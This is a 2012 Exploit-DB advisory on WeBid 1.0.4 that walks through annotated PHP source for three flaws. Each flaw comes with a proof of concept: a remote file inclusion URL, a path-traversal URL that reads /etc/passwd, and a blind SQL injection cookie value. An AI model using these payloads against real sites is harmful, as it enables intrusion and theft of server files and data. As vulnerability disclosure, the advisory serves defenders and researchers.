webid 1.0.4 - Multiple Vulnerabilities

EDB-ID:

20580

CVE:



Author:

dun

Type:

webapps


Platform:

PHP

Date:

2012-08-17


  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-08-17                              ]
 ################################################
 # [ WeBid <= 1.0.4 ] Multiple Vulnerabilities  #
 ################################################
 #
 # Script: "Open source php/mysql fully featured auction script"
 #
 # Vendor:   http://www.webidsupport.com/
 # Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
 #
 ################################################
 # [RFI] ( allow_url_include = On; register_globals = On; )
 # PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
 #
 # File: ./WeBid/loader.php (lines: 15-60)
 #  ..cut..
 # ob_start('ob_gzhandler');
 # header("Content-type: text/javascript");
 # include 'includes/checks/files.php';               // 1 ( Definition of $file_hashs array )
 # if (isset($_GET['js']))
 # {
 #    $js = explode(';', $_GET['js']);                // 3 js = admin/logout.php (for example) 
 #    foreach ($js as $val)
 #    {
 #       $ext = substr($val, strrpos($val, '.') + 1); // 4
 #       if ($ext == 'php')                           // 4
 #       {
 #          if (check_file($val))                     // 5
 #          {
 #             include $val;                          // 10 include admin/logout.php
 #          }
 #       }
 #  ..cut..
 #    }
 # }
 # ob_end_flush();
 #
 # function check_file($file)
 # {
 #    global $file_hashs;                             // 6
 #    $tmp = $file_hashs;
 #    $folders = explode('/', $file);                 // 7 $folders = Array([0] => admin, [1] => logout.php)
 #    foreach ($folders as $val)                      // 8 This loop checks if parts of $folders are in $file_hashs
 #    {
 #       if (isset($tmp[$val]))
 #       {
 #          $tmp = $tmp[$val];
 #       }
 #       else
 #       {
 #          return false;
 #       }
 #    }
 #    return true;                                    // 9 admin/logout.php passed
 # }
 #  ..cut..
 #
 # File: ./WeBid/includes/checks/files.php (lines: 2-19)
 #  ..cut..
 # $file_hashs = array(                                      // 2 List of files that can be included.
 #  ..cut..
 #    'admin' => array(                                      // 2 
 #       'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
 #        ..cut..
 #    ),
 #  ..cut..
 # );
 #
 # File: ./WeBid/admin/logout.php (lines: 16-17)
 #  ..cut..                                           // 11 common.inc.php file contains a definition of $include_path
 # include '../includes/common.inc.php';              // 11 Failed, because loader.php is in root path
 # include $include_path . 'functions_admin.php';     // 12 *[RFI] $include_path is not set by script
 #  ..cut..                                           // 12 If register_globals is On, we can set $include_path
 #
 ################################################
 # [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
 # PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
 #
 # File: ./WeBid/getthumb.php (lines: 17-52)
 #  ..cut..
 # $w = (isset($_GET['w'])) ? $_GET['w'] : '';                                      // 1
 # $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : '';                 // 2
 # $nomanage = false;
 #  ..cut..
 # if (!isset($_GET['fromfile']))                                                   // 3
 # {
 #    ErrorPNG('params empty');
 #    exit;
 # }
 # elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r'))       // 4
 # {
 #    ErrorPNG('img does not exist');
 #    exit;
 # }
 #
 # if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)))    // 5
 # {
 #    $img = getimagesize($fromfile);
 #    if ($img[2] == 1)
 #    {
 #       $img['mime'] = 'image/png';
 #    }
 #    header('Content-type: ' . $img['mime']);
 #    echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
 #    }
 # }
 #  ..cut..
 #
 ################################################
 # [Blind SQL Injection] ( magic_quotes_gpc = Off; )
 # PoC:
 # http://localhost/WeBid/contents.php
 # GET /WeBid/contents.php HTTP/1.1
 # Host: localhost
 # User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 # Accept-Language: pl,en-us;q=0.7,en;q=0.3
 # Accept-Encoding: gzip, deflate
 # Connection: keep-alive
 # Cookie: WEBID_ONLINE=-1' OR 1=1--
 #
 # File: ./WeBid/contents.php (lines: 15, 38)
 #  ..cut..
 # include 'includes/common.inc.php';
 #  ..cut..
 # include 'header.php';                                        // 1
 #  ..cut..
 #
 # File: ./WeBid/header.php (line: 26)
 #  ..cut..
 # $counters = load_counters();                                 // 2
 #  ..cut..
 #
 # File: ./WeBid/includes/functions_global.php (line: 287-320)
 #  ..cut..
 # function load_counters()                                     // 3
 # {
 #  ..cut..
 #      if (!$user->logged_in)
 #      {
 #         if (!isset($_COOKIE['WEBID_ONLINE']))
 #         {
 #            $s = md5(rand(0, 99) . session_id());
 #            setcookie('WEBID_ONLINE', $s, time() + 900);
 #         }
 #         else
 #         {
 #            $s = $_COOKIE['WEBID_ONLINE'];                    // 4
 #            setcookie('WEBID_ONLINE', $s, time() + 900);
 #         }
 #      }
 #  ..cut..
 #      $query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
 #      $res = mysql_query($query);
 #      $system->check_mysql($res, $query, __LINE__, __FILE__);
 #  ..cut..
 #
 ### [ dun / 2012 ] #############################